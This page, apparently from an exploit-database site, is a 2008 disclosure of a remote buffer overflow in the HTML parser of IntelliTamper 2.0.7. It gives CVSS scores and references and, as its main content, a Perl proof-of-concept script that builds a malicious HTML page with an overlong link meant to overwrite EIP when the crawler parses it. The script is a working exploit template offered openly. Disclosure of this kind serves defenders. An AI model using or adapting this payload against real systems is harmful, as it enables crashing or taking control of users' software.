IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow PoC

2008.07.31
Credit: k`sOSe
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/perl # # k`sOSe - 07/21/2008 # # This is NOT http://secunia.com/advisories/20172/. # There are some BOFs in the html parser, just put a properly # formatted html file in your website and launch IntelliTamper against it. use warnings; use strict; my $evil_html = '<html><head><title>ph33r</title></head><body>' . '<a href="http://google.it/' . "\x41" x 450 . "\x42" x 4 . # EIP '.htm">ph33r</a>' . "</body></html>"; print $evil_html;

References:

http://www.securitytracker.com/id?1020521
http://www.securityfocus.com/bid/30317
http://www.milw0rm.com/exploits/6121
http://www.milw0rm.com/exploits/6116
http://www.milw0rm.com/exploits/6103
http://www.frsirt.com/english/advisories/2008/2120/references


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top